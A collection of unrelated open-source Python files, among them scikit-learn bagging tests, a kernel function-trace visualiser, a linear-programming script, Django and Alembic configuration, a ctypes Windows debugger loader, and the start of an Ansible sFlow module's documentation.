assert_warns(UserWarning,
BaggingRegressor(base_estimator=DecisionTreeRegressor(),
n_estimators=1,
bootstrap=True,
oob_score=True,
random_state=rng).fit,
X_train,
y_train)
def test_single_estimator():
# Check singleton ensembles.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
clf1 = BaggingRegressor(base_estimator=KNeighborsRegressor(),
n_estimators=1,
bootstrap=False,
bootstrap_features=False,
random_state=rng).fit(X_train, y_train)
clf2 = KNeighborsRegressor().fit(X_train, y_train)
assert_array_equal(clf1.predict(X_test), clf2.predict(X_test))
def test_error():
# Test that it gives proper exception on deficient input.
X, y = iris.data, iris.target
base = DecisionTreeClassifier()
# Test max_samples
assert_raises(ValueError,
BaggingClassifier(base, max_samples=-1).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=0.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=2.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples=1000).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_samples="foobar").fit, X, y)
# Test max_features
assert_raises(ValueError,
BaggingClassifier(base, max_features=-1).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=0.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=2.0).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features=5).fit, X, y)
assert_raises(ValueError,
BaggingClassifier(base, max_features="foobar").fit, X, y)
# Test support of decision_function
assert_false(hasattr(BaggingClassifier(base).fit(X, y), 'decision_function'))
def test_parallel_classification():
# Check parallel classification.
rng = check_random_state(0)
# Classification
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
# predict_proba
ensemble.set_params(n_jobs=1)
y1 = ensemble.predict_proba(X_test)
ensemble.set_params(n_jobs=2)
y2 = ensemble.predict_proba(X_test)
assert_array_almost_equal(y1, y2)
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=1,
random_state=0).fit(X_train, y_train)
y3 = ensemble.predict_proba(X_test)
assert_array_almost_equal(y1, y3)
# decision_function
ensemble = BaggingClassifier(SVC(decision_function_shape='ovr'),
n_jobs=3,
random_state=0).fit(X_train, y_train)
ensemble.set_params(n_jobs=1)
decisions1 = ensemble.decision_function(X_test)
ensemble.set_params(n_jobs=2)
decisions2 = ensemble.decision_function(X_test)
assert_array_almost_equal(decisions1, decisions2)
ensemble = BaggingClassifier(SVC(decision_function_shape='ovr'),
n_jobs=1,
random_state=0).fit(X_train, y_train)
decisions3 = ensemble.decision_function(X_test)
assert_array_almost_equal(decisions1, decisions3)
def test_parallel_regression():
# Check parallel regression.
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
ensemble.set_params(n_jobs=1)
y1 = ensemble.predict(X_test)
ensemble.set_params(n_jobs=2)
y2 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y2)
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=1,
random_state=0).fit(X_train, y_train)
y3 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y3)
def test_gridsearch():
# Check that bagging ensembles can be grid-searched.
# Transform iris into a binary classification task
X, y = iris.data, iris.target
y[y == 2] = 1
# Grid search with scoring based on decision_function
parameters = {'n_estimators': (1, 2),
'base_estimator__C': (1, 2)}
GridSearchCV(BaggingClassifier(SVC()),
parameters,
scoring="roc_auc").fit(X, y)
def test_base_estimator():
# Check base_estimator and its default values.
rng = check_random_state(0)
# Classification
X_train, X_test, y_train, y_test = train_test_split(iris.data,
iris.target,
random_state=rng)
ensemble = BaggingClassifier(None,
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeClassifier))
ensemble = BaggingClassifier(DecisionTreeClassifier(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeClassifier))
ensemble = BaggingClassifier(Perceptron(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, Perceptron))
# Regression
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = BaggingRegressor(None,
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeRegressor))
ensemble = BaggingRegressor(DecisionTreeRegressor(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, DecisionTreeRegressor))
ensemble = BaggingRegressor(SVR(),
n_jobs=3,
random_state=0).fit(X_train, y_train)
assert_true(isinstance(ensemble.base_estimator_, SVR))
def test_bagging_with_pipeline():
estimator = BaggingClassifier(make_pipeline(SelectKBest(k=1),
DecisionTreeClassifier()),
max_features=2)
estimator.fit(iris.data, iris.target)
assert_true(isinstance(estimator[0].steps[-1][1].random_state,
int))
class DummyZeroEstimator(BaseEstimator):
def fit(self, X, y):
self.classes_ = np.unique(y)
return self
def predict(self, X):
return self.classes_[np.zeros(X.shape[0], dtype=int)]
def test_bagging_sample_weight_unsupported_but_passed():
estimator = BaggingClassifier(DummyZeroEstimator())
rng = check_random_state(0)
estimator.fit(iris.data, iris.target).predict(iris.data)
assert_raises(ValueError, estimator.fit, iris.data, iris.target,
sample_weight=rng.randint(10, size=(iris.data.shape[0])))
def test_warm_start(random_state=42):
# Test if fitting incrementally with warm start gives a forest of the
# right size and the same results as a normal fit.
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf_ws = None
for n_estimators in [5, 10]:
if clf_ws is None:
clf_ws = BaggingClassifier(n_estimators=n_estimators,
random_state=random_state,
warm_start=True)
else:
clf_ws.set_params(n_estimators=n_estimators)
clf_ws.fit(X, y)
assert_equal(len(clf_ws), n_estimators)
clf_no_ws = BaggingClassifier(n_estimators=10, random_state=random_state,
warm_start=False)
clf_no_ws.fit(X, y)
assert_equal(set([tree.random_state for tree in clf_ws]),
set([tree.random_state for tree in clf_no_ws]))
def test_warm_start_smaller_n_estimators():
# Test if warm start'ed second fit with smaller n_estimators raises error.
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf = BaggingClassifier(n_estimators=5, warm_start=True)
clf.fit(X, y)
clf.set_params(n_estimators=4)
assert_raises(ValueError, clf.fit, X, y)
def test_warm_start_equal_n_estimators():
# Test that nothing happens when fitting without increasing n_estimators
X, y = make_hastie_10_2(n_samples=20, random_state=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=43)
clf = BaggingClassifier(n_estimators=5, warm_start=True, random_state=83)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# modify X to nonsense values, this should not change anything
X_train += 1.
assert_warns_message(UserWarning,
"Warm-start fitting without increasing n_estimators does not",
clf.fit, X_train, y_train)
assert_array_equal(y_pred, clf.predict(X_test))
def test_warm_start_equivalence():
# warm started classifier with 5+5 estimators should be equivalent to
# one classifier with 10 estimators
X, y = make_hastie_10_2(n_samples=20, random_state=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=43)
clf_ws = BaggingClassifier(n_estimators=5, warm_start=True,
random_state=3141)
clf_ws.fit(X_train, y_train)
clf_ws.set_params(n_estimators=10)
clf_ws.fit(X_train, y_train)
y1 = clf_ws.predict(X_test)
clf = BaggingClassifier(n_estimators=10, warm_start=False,
random_state=3141)
clf.fit(X_train, y_train)
y2 = clf.predict(X_test)
assert_array_almost_equal(y1, y2)
def test_warm_start_with_oob_score_fails():
# Check using oob_score and warm_start simultaneously fails
X, y = make_hastie_10_2(n_samples=20, random_state=1)
clf = BaggingClassifier(n_estimators=5, warm_start=True, oob_score=True)
assert_raises(ValueError, clf.fit, X, y)
def test_oob_score_removed_on_warm_start():
X, y = make_hastie_10_2(n_samples=2000, random_state=1)
clf = BaggingClassifier(n_estimators=50, oob_score=True)
clf.fit(X, y)
clf.set_params(warm_start=True, oob_score=False, n_estimators=100)
clf.fit(X, y)
assert_raises(AttributeError, getattr, clf, "oob_score_")
def test_oob_score_consistency():
# Make sure OOB scores are identical when random_state, estimator, and
# training data are fixed and fitting is done twice
X, y = make_hastie_10_2(n_samples=200, random_state=1)
bagging = BaggingClassifier(KNeighborsClassifier(), max_samples=0.5,
max_features=0.5, oob_score=True,
random_state=1)
assert_equal(bagging.fit(X, y).oob_score_, bagging.fit(X, y).oob_score_)
def test_estimators_samples():
# Check that format of estimators_samples_ is correct and that results
# generated at fit time can be identically reproduced at a later time
# using data saved in object attributes.
X, y = make_hastie_10_2(n_samples=200, random_state=1)
bagging = BaggingClassifier(LogisticRegression(), max_samples=0.5,
max_features=0.5, random_state=1,
bootstrap=False)
bagging.fit(X, y)
# Get relevant attributes
estimators_samples = bagging.estimators_samples_
estimators_features = bagging.estimators_features_
estimators = bagging.estimators_
# Test for correct formatting
assert_equal(len(estimators_samples), len(estimators))
assert_equal(len(estimators_samples[0]), len(X))
assert_equal(estimators_samples[0].dtype.kind, 'b')
# Re-fit single estimator to test for consistent sampling
estimator_index = 0
estimator_samples = estimators_samples[estimator_index]
estimator_features = estimators_features[estimator_index]
estimator = estimators[estimator_index]
X_train = (X[estimator_samples])[:, estimator_features]
y_train = y[estimator_samples]
orig_coefs = estimator.coef_
estimator.fit(X_train, y_train)
new_coefs = estimator.coef_
assert_array_almost_equal(orig_coefs, new_coefs)
def test_max_samples_consistency():
# Make sure validated max_samples and original max_samples are identical
# when valid integer max_samples supplied by user
max_samples = 100
X, y = make_hastie_10_2(n_samples=2*max_samples, random_state=1)
bagging = BaggingClassifier(KNeighborsClassifier(),
max_samples=max_samples,
max_features=0.5, random_state=1)
bagging.fit(X, y)
assert_equal(bagging._max_samples, max_samples)
|
gpitel/pyjs
|
refs/heads/master
|
examples/libtest/WindowTest.py
|
7
|
from UnitTest import UnitTest, IN_BROWSER
from pyjamas import Window
class WindowTest(UnitTest):
"""tests for javascript object conversion"""
def onWindowResized(self, width, height):
if not self.resize_test:
self.fail("onWindowResized called after WindowListener removed")
return
nh = Window.getClientHeight()
nw = Window.getClientWidth()
# TODO: we cannot assert the exact size, because, we have toolbars
self.assertTrue(nw!=self.w)
self.assertTrue(nh!=self.h)
self.assertTrue(isinstance(nw, int))
self.assertTrue(isinstance(nh, int))
# put the window back to its original size
# but make sure to switch off resize notify!
self.resize_test = False
Window.removeWindowResizeListener(self)
Window.resize(self.w, self.h)
def testResize(self):
        # TODO: window resizing does not work accurately in the browser
        # because getClientWidth etc. does not really match GWT. We
# need to copy the GWT implementation
if IN_BROWSER:
return
self.resize_test = True
Window.addWindowResizeListener(self)
self.h = Window.getClientHeight()
self.w = Window.getClientWidth()
Window.resize(800, 600)
def testClientDimensions(self):
h = Window.getClientHeight()
w = Window.getClientWidth()
self.assertTrue(isinstance(w, int))
self.assertTrue(isinstance(h, int))
def testLocation(self):
self.assertTrue(Window.getLocation().getHref().endswith(
'LibTest.html'))
def testTitle(self):
self.assertEquals(Window.getTitle(),
'LibTest')
|
stphivos/django-paypal
|
refs/heads/master
|
paypal/standard/pdt/tests/settings.py
|
26
|
from __future__ import unicode_literals
import os
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
# Django 1.8 and later
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
TEMPLATE_DIR,
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Django 1.7 and earlier
TEMPLATE_DIRS = [TEMPLATE_DIR]
|
balticembedded/be-kernel
|
refs/heads/be_imx_2.6.35_maintain
|
scripts/tracing/draw_functrace.py
|
14679
|
#!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more human
view of the call stack by drawing a textual but hierarchical tree of
calls. Only the functions' names and the call times are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some time, but not too much: the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
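# Illustrative example (not part of the original script): a raw ftrace line
# such as
#
#     bash-4251  [001]  7464.999195: _spin_lock_irqsave <-get_page_from_freelist
#
# is matched by the regex in parseLine(), which returns the tuple
# ('7464.999195', '_spin_lock_irqsave', 'get_page_from_freelist'), i.e.
# (calltime, callee, caller); main() then hangs the callee under the caller
# in the CallTree.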
|
nasonfish/algebra-py
|
refs/heads/master
|
linear_programming.py
|
1
|
#!/usr/bin/python
"""
This program is free and open source, released into the public domain.
Daniel Barnes http://nasonfish.com/
This program is made for linear programming, as discussed in my math book.
The program accepts a list of inequalities (in the form of ax+by=c, where
a, b, and c are integers or floats in the form of `[+-]?\d+(\.\d+)?` if
you speak magic) and it essentially lays all the inequalities out
together to trace out the shape of a feasible region.
The program is also given a goal - minimize or maximize - and a value for
x and y.
According to the corner-point principle, one of the corners of the feasible
region, plugged in for x and y, gives the best possible value toward the
goal of minimizing or maximizing.
Here's an example problem:
There are two types of computers I can make. Computer A takes 10 minutes
to assemble, while Computer B takes 20 minutes.
There are 120 total minutes available to be spread among the computers.
Find the way to maximize the profit where Computer A's profit is $20.00 and
Computer B's profit is $35.00
We can find the inequalities from the problem as
10x+20y<=120, because only 120 minutes are available, so x and y can be
anything that fits within that limit.
x and y must also be at least 0; we can't make negative computers.
1x+0y>=0, 0x+1y>=0
The profit is 20x+35y.
We can pass all the information to the program as so:
nasonfish@nasonfish.com ~> ./linear_programming.py max "20x+35y" "10x+20y<=120" "1x+0y>=0" "0x+1y>=0"
Finding the max of {'y': 35.0, 'x': 20.0} with equations: [10.0x+20.0y<=120.0, 1.0x+0.0y>=0.0, 0.0x+1.0y>=0.0]
ans is 240.0 as [(12.0, 0.0)]
The maximum profit is $240, achieved by putting all resources into
making Computer A, of which we make 12 (that's x in the (x, y) tuple;
the list can hold multiple points if it needs to).
# goal values equations, each as a separate argument. Must be in that form.
Usage: ./linear_programming.py (max|min) <a>x+<b>y [ax+by>=c ...]
"""
# This comes in handy later, trust me
from linear import Equation
import re
import sys
find_max = sys.argv[1] == "max" # max or min?
matches = re.match(r'^(-?\d+)x([+-]\d+)y$', sys.argv[2]) # 10x+20y
values = {"x": float(matches.group(1)), "y": float(matches.group(2))}
e = sys.argv[3:]
#e = map(Equation, e)
e = [Equation(s) for s in e]
copy = e[:]
points = [] # list of tuples
print("Finding the %s of %s with equations: %s" % ("max" if find_max else "min", values, e))
def check(e1, e2):
    # find the intersection point of equations 1 and 2, then make sure it
    # satisfies every other inequality in `copy`.
point = intersect(e1, e2)
if not point:
return False
for e in copy:
if e is e1 or e is e2:
continue
if not e.f(point):
return False
return point
def intersect(e1, e2):
# ax + by = c
# remember that x and y, as fields, are just
# coefficients of x and y. great naming :|
# solving a system of equations:
# ax/a + by/a = c/a (1)
# dx/d + ey/d = f/d (2)
# (b/a)y - (e/d)y = c/a - f/d
# ((b/a)-(e/d))y = c/a - f/d
# y = ((c/a) - (f/d))/((b/a)-(e/d))
# x = (c - b*y)/a
if 0.0 in (e1.x, e1.y, e2.x, e2.y):
if (e1.x == 0.0 and e2.x == 0.0) or (e1.y == 0.0 and e2.y == 0.0):
return False
if e1.x == 0.0:
y = e1.c/e1.y
if e2.y == 0.0:
x = e2.c/e2.x
else:
x = (e2.c - (e2.y * y))/e2.x
if e1.y == 0.0:
x = e1.c/e1.x
if e2.x == 0.0:
y = e2.c/e2.y
else:
y = (e2.c - (e2.x * x))/e2.y
if e2.x == 0.0:
y = e2.c/e2.y
x = (e1.c - (e1.y * y))/e1.x
if e2.y == 0.0:
x = e2.c/e2.x
y = (e1.c - (e1.x * x))/e1.y
return (x, y)
# I'm actually really sorry for this. :(
y = ((e1.c/e1.x) - (e2.c/e2.x))/((e1.y/e1.x)-(e2.y/e2.x))
x = (e1.c - (e1.y*y))/e1.x
    # remember that equation.f(tuple) returns a boolean - for checking whether a point is in the feasible region
return (x, y)
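# Quick numeric sanity check of the algebra above (illustrative, not part of
# the original script): for e1: 10x + 20y = 120 and e2: 2x + 1y = 18,
#   y = ((120/10) - (18/2)) / ((20/10) - (1/2)) = (12 - 9) / (2 - 0.5) = 2.0
#   x = (120 - 20*2) / 10 = 8.0
# and indeed 2*8 + 1*2 = 18, so intersect(e1, e2) would return (8.0, 2.0).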
# Here's something awfully complicated!
# As we work through the expressions, we pop each one off the front of the
# list so that every pair of equations is only considered once.
# Each intersection point we find is added to a list; check() then uses
# `copy` to make sure the point satisfies the lines it wasn't part of.
# Essentially, we want to execute a certain function one time for
# every combination of two equations.
# maybe McMorrow can help! :O
# (Iterating over `e` while removing from it would skip elements, so we
# pop from the front instead.)
while e:
    expression = e.pop(0)
    for ch in e:
        res = check(expression, ch)
        if res:
            points.append(res)
ans = None
ans_points = []
for point in points:
curr = (float(values['x']) * point[0]) + (float(values['y']) * point[1])
if not ans or (ans > curr and not find_max) or (ans < curr and find_max):
ans = curr
ans_points = [point]
elif ans == curr:
ans_points.append(point)
print "ans is %s as %s" % (ans, ans_points)
|
jobscore/sync-engine
|
refs/heads/master
|
inbox/util/stats.py
|
3
|
import statsd
from inbox.config import config
def get_statsd_client():
return statsd.StatsClient(
str(config.get("STATSD_HOST", "localhost")),
config.get("STATSD_PORT", 8125),
prefix=config.get("STATSD_PREFIX", "stats"))
statsd_client = get_statsd_client()
|
glue-viz/glue-3d-viewer
|
refs/heads/master
|
glue_vispy_viewers/volume/layer_state.py
|
3
|
from glue.core import Subset
from glue.external.echo import (CallbackProperty, SelectionCallbackProperty,
delay_callback)
from glue.core.state_objects import StateAttributeLimitsHelper
from glue.core.data_combo_helper import ComponentIDComboHelper
from ..common.layer_state import VispyLayerState
__all__ = ['VolumeLayerState']
class VolumeLayerState(VispyLayerState):
"""
A state object for volume layers
"""
attribute = SelectionCallbackProperty()
vmin = CallbackProperty()
vmax = CallbackProperty()
subset_mode = CallbackProperty('data')
limits_cache = CallbackProperty({})
def __init__(self, layer=None, **kwargs):
super(VolumeLayerState, self).__init__(layer=layer)
if self.layer is not None:
self.color = self.layer.style.color
self.alpha = self.layer.style.alpha
self.att_helper = ComponentIDComboHelper(self, 'attribute')
self.lim_helper = StateAttributeLimitsHelper(self, attribute='attribute',
lower='vmin', upper='vmax',
cache=self.limits_cache)
self.add_callback('layer', self._on_layer_change)
if layer is not None:
self._on_layer_change()
if isinstance(self.layer, Subset):
self.vmin = 0
self.vmax = 1
self.update_from_dict(kwargs)
def _on_layer_change(self, layer=None):
        with delay_callback(self, 'vmin', 'vmax'):
if self.layer is None:
self.att_helper.set_multiple_data([])
else:
self.att_helper.set_multiple_data([self.layer])
def update_priority(self, name):
return 0 if name.endswith(('vmin', 'vmax')) else 1
|
ErinCall/sync-engine
|
refs/heads/master
|
migrations/versions/032_tighten_easuid.py
|
9
|
"""Tighten EAS constraints and fix easfoldersync state enum.
Revision ID: 3f96e92953e1
Revises: 55f0ff54c776
Create Date: 2014-05-21 17:43:44.556716
"""
# revision identifiers, used by Alembic.
revision = '3f96e92953e1'
down_revision = '55f0ff54c776'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.ext.declarative import declarative_base
def upgrade():
from inbox.ignition import main_engine
engine = main_engine(pool_size=1, max_overflow=0)
Base = declarative_base()
Base.metadata.reflect(engine)
if 'easfoldersync' in Base.metadata.tables:
op.alter_column('easfoldersync', 'state',
type_=sa.Enum('initial', 'initial keyinvalid',
'poll', 'poll keyinvalid', 'finish'),
existing_nullable=False,
server_default='initial')
if 'easuid' in Base.metadata.tables:
op.alter_column('easuid', 'message_id', existing_type=sa.Integer(),
nullable=False)
op.alter_column('easuid', 'fld_uid', existing_type=sa.Integer(),
nullable=False)
op.alter_column('easuid', 'msg_uid', existing_type=sa.Integer(),
nullable=False)
def downgrade():
from inbox.ignition import main_engine
engine = main_engine(pool_size=1, max_overflow=0)
Base = declarative_base()
Base.metadata.reflect(engine)
if 'easfoldersync' in Base.metadata.tables:
op.alter_column('easfoldersync', 'state',
type_=sa.Enum('initial', 'initial uidinvalid',
'poll', 'poll uidinvalid', 'finish'),
existing_nullable=False)
if 'easuid' in Base.metadata.tables:
op.alter_column('easuid', 'message_id', existing_type=sa.Integer(),
nullable=True)
op.alter_column('easuid', 'fld_uid', existing_type=sa.Integer(),
nullable=True)
op.alter_column('easuid', 'msg_uid', existing_type=sa.Integer(),
nullable=True)
|
Urinx/SomeCodes
|
refs/heads/master
|
Python/python_gray/debugger1.0/my_debugger.py
|
1
|
from ctypes import *
from my_debugger_defines import *
kernel32=windll.kernel32
class debugger(object):
def __init__(self):
pass
def load(self,path_to_exe):
"""
dwCreation flag determines how to create the process
set creation_flags=CREATE_NEW_CONSOLE if you want to see the calculator GUI
"""
creation_flags=DEBUG_PROCESS
#creation_flags=CREATE_NEW_CONSOLE
#instantiate the structs
startupinfo=STARTUPINFO()
process_information=PROCESS_INFORMATION()
"""
The following two options allow the started process to be shown as
        a separate window. This also illustrates how different settings in the
STARTUPINFO struct can affect the debugger.
"""
startupinfo.dwFlags=0x1
startupinfo.wShowWindow=0x0
"""
We then initialize the cb variable in the STARTUPINFO struct
which is just the size of the struct itself
"""
startupinfo.cb=sizeof(startupinfo)
if kernel32.CreateProcessA(
path_to_exe,
None,
None,
None,
None,
creation_flags,
None,
None,
byref(startupinfo),
byref(process_information)
):
            print '[*] We have successfully launched the process!'
print '[*] PID:%d' % process_information.dwProcessId
else:
print '[*] Error:0x%08x.' % kernel32.GetLastError()
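# Minimal usage sketch (illustrative; the target path is an assumption, and
# like the rest of this module it is Python 2 / Windows only):
#
#     import my_debugger
#     debugger = my_debugger.debugger()
#     debugger.load("C:\\Windows\\System32\\calc.exe")
#
# This launches calc.exe as a debugged process and prints its PID.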
|
roselleebarle04/django
|
refs/heads/master
|
django/conf/locale/mk/formats.py
|
504
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', '%d.%m.%y', # '25.10.2006', '25.10.06'
'%d. %m. %Y', '%d. %m. %y', # '25. 10. 2006', '25. 10. 06'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
'%d. %m. %Y %H:%M:%S', # '25. 10. 2006 14:30:59'
'%d. %m. %Y %H:%M:%S.%f', # '25. 10. 2006 14:30:59.000200'
'%d. %m. %Y %H:%M', # '25. 10. 2006 14:30'
'%d. %m. %Y', # '25. 10. 2006'
'%d. %m. %y %H:%M:%S', # '25. 10. 06 14:30:59'
'%d. %m. %y %H:%M:%S.%f', # '25. 10. 06 14:30:59.000200'
'%d. %m. %y %H:%M', # '25. 10. 06 14:30'
'%d. %m. %y', # '25. 10. 06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
dagwieers/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/cloudengine/ce_sflow.py
|
32
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ce_sflow
version_added: "2.4"
short_description: Manages sFlow configuration on HUAWEI CloudEngine switches.
description:
- Configure Sampled Flow (sFlow) to monitor traffic on an interface in real time,
detect abnormal traffic, and locate the source of attack traffic,
ensuring stable running of the network.
author: QijunPan (@QijunPan)
options:
agent_ip:
description:
- Specifies the IPv4/IPv6 address of an sFlow agent.
source_ip:
description:
- Specifies the source IPv4/IPv6 address of sFlow packets.
collector_id:
description:
- Specifies the ID of an sFlow collector. This ID is used when you specify
the collector in subsequent sFlow configuration.
choices: ['1', '2']
collector_ip:
description:
- Specifies the IPv4/IPv6 address of the sFlow collector.
collector_ip_vpn:
description:
- Specifies the name of a VPN instance.
The value is a string of 1 to 31 case-sensitive characters, spaces not supported.
When double quotation marks are used around the string, spaces are allowed in the string.
The value C(_public_) is reserved and cannot be used as the VPN instance name.
collector_datagram_size:
description:
- Specifies the maximum length of sFlow packets sent from an sFlow agent to an sFlow collector.
The value is an integer, in bytes. It ranges from 1024 to 8100. The default value is 1400.
collector_udp_port:
description:
- Specifies the UDP destination port number of sFlow packets.
The value is an integer that ranges from 1 to 65535. The default value is 6343.
collector_meth:
description:
- Configures the device to send sFlow packets through service interfaces,
enhancing the sFlow packet forwarding capability.
The enhanced parameter is optional. No matter whether you configure the enhanced mode,
the switch determines to send sFlow packets through service cards or management port
based on the routing information on the collector.
When the value is meth, the device forwards sFlow packets at the control plane.
When the value is enhanced, the device forwards sFlow packets at the forwarding plane to
enhance the sFlow packet forwarding capacity.
choices: ['meth', 'enhanced']
collector_description:
description:
- Specifies the description of an sFlow collector.
The value is a string of 1 to 255 case-sensitive characters without spaces.
sflow_interface:
description:
- Full name of interface for Flow Sampling or Counter.
It must be a physical interface, Eth-Trunk, or Layer 2 subinterface.
sample_collector:
description:
- Indicates the ID list of the collector.
sample_rate:
description:
- Specifies the flow sampling rate in the format 1/rate.
The value is an integer and ranges from 1 to 4294967295. The default value is 8192.
sample_length:
description:
- Specifies the maximum length of sampled packets.
The value is an integer and ranges from 18 to 512, in bytes. The default value is 128.
sample_direction:
description:
- Enables flow sampling in the inbound or outbound direction.
choices: ['inbound', 'outbound', 'both']
counter_collector:
description:
- Indicates the ID list of the counter collector.
counter_interval:
description:
- Indicates the counter sampling interval.
The value is an integer that ranges from 10 to 4294967295, in seconds. The default value is 20.
export_route:
description:
- Configures the sFlow packets sent by the switch not to carry routing information.
